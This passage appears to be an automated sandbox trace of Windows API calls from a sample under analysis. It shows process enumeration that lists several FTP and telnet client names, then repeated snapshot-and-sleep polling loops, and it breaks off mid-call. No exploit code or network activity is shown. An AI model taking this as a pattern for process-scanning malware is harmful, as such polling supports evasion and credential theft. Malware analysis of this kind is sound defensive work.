Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="releases.exe")) returned 1 [0100.895] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mediterranean.exe")) returned 1 [0100.896] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="junk_ti.exe")) returned 1 [0100.897] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gps_conduct_strips.exe")) returned 1 [0100.897] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="appealfaqcove.exe")) returned 1 [0100.898] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="generated.exe")) returned 1 [0100.898] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="nbaemotions.exe")) returned 1 [0100.899] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="cowdirector.exe")) returned 1 [0100.899] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pill sri.exe")) returned 1 [0100.900] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightweight-yr.exe")) returned 1 [0100.900] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="somerset_concluded_twice.exe")) returned 1 [0100.901] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0100.901] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0100.901] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0100.902] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0100.941] Sleep (dwMilliseconds=0x64) [0101.504] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xf4 [0101.535] Process32FirstW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.620] Sleep (dwMilliseconds=0x64) [0101.825] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xf8 [0101.840] Process32FirstW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.266] Sleep (dwMilliseconds=0x64) [0102.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xfc [0102.398] Process32FirstW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.450] Sleep (dwMilliseconds=0x64) [0102.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x100 [0102.807] Process32FirstW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.029] Sleep (dwMilliseconds=0x64) [0103.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0103.148] Process32FirstW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.218] Sleep (dwMilliseconds=0x64) [0103.425] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x108 [0103.429] Process32FirstW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.510] Sleep (dwMilliseconds=0x64) [0103.927] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10c [0103.937] Process32FirstW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.104] Sleep (dwMilliseconds=0x64) [0104.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x110 [0104.245] Process32FirstW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x114 [0104.686] Process32FirstW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x118 [0105.006] Process32FirstW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.267] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11c [0105.271] Process32FirstW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0105.498] Process32FirstW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.568] Sleep (dwMilliseconds=0x64) [0105.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x124 [0105.690] Process32FirstW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.790] Sleep (dwMilliseconds=0x64) [0105.938] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x128 [0105.942] Process32FirstW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.048] Sleep (dwMilliseconds=0x64) [0106.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0106.158] Process32FirstW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.384] Sleep (dwMilliseconds=0x64) [0106.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x130 [0106.566] Process32FirstW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.636] Sleep (dwMilliseconds=0x64) [0106.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x134 [0106.798] Process32FirstW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.851] Sleep (dwMilliseconds=0x64) [0107.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x138 [0107.015] Process32FirstW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.132] Sleep (dwMilliseconds=0x64) [0107.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x13c [0107.239] Process32FirstW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.360] Sleep (dwMilliseconds=0x64) [0107.463] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140 [0107.467] Process32FirstW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.564] Sleep (dwMilliseconds=0x64) [0107.666] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x144 [0107.670] Process32FirstW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.739] Sleep (dwMilliseconds=0x64) [0107.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0107.845] Process32FirstW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.902] Sleep (dwMilliseconds=0x64) [0108.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14c [0108.013] Process32FirstW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.066] Sleep (dwMilliseconds=0x64) [0108.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x150 [0108.190] Process32FirstW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.293] Sleep (dwMilliseconds=0x64) [0108.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x154 [0108.436] Process32FirstW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.563] Sleep (dwMilliseconds=0x64) [0108.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x158 [0108.728] Process32FirstW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.793] Sleep (dwMilliseconds=0x64) [0108.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15c [0108.996] Process32FirstW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.096] Sleep (dwMilliseconds=0x64) [0109.226] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x160 [0109.230] Process32FirstW (in: hSnapshot=0x160, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.293] Sleep (dwMilliseconds=0x64) [0109.401] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0109.419] Process32FirstW (in: hSnapshot=0x164, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.514] Sleep (dwMilliseconds=0x64) [0109.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x168 [0109.679] Process32FirstW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.798] Sleep (dwMilliseconds=0x64) [0109.897] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x16c [0109.900] Process32FirstW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.955] Sleep (dwMilliseconds=0x64) [0110.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0110.071] Process32FirstW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.129] Sleep (dwMilliseconds=0x64) [0110.225] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x174 [0110.229] Process32FirstW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.281] Sleep (dwMilliseconds=0x64) [0110.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x178 [0110.401] Process32FirstW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.457] Sleep (dwMilliseconds=0x64) [0110.552] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0110.556] Process32FirstW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.626] Sleep (dwMilliseconds=0x64) [0110.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0110.728] Process32FirstW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.791] Sleep (dwMilliseconds=0x64) [0110.896] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184 [0110.900] Process32FirstW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.953] Sleep (dwMilliseconds=0x64) [0111.053] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188 [0111.057] Process32FirstW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.109] Sleep (dwMilliseconds=0x64) [0111.207] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0111.212] Process32FirstW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.281] Sleep (dwMilliseconds=0x64) [0111.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0111.383] Process32FirstW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.444] Sleep (dwMilliseconds=0x64) [0111.554] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x194 [0111.558] Process32FirstW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.622] Sleep (dwMilliseconds=0x64) [0111.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0111.728] Process32FirstW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.827] Sleep (dwMilliseconds=0x64) [0111.965] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0111.969] Process32FirstW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.055] Sleep (dwMilliseconds=0x64) [0112.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0112.194] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.259] Sleep (dwMilliseconds=0x64) [0112.362] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0112.366] Process32FirstW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.467] Sleep (dwMilliseconds=0x64) [0112.729] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a8 [0112.733] Process32FirstW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.821] Sleep (dwMilliseconds=0x64) [0112.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ac [0112.930] Process32FirstW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.996] Sleep (dwMilliseconds=0x64) [0113.097] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b0 [0113.101] Process32FirstW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.152] Sleep (dwMilliseconds=0x64) [0113.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b4 [0113.259] Process32FirstW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.310] Sleep (dwMilliseconds=0x64) [0113.410] CreateToolhelp32Snapshot 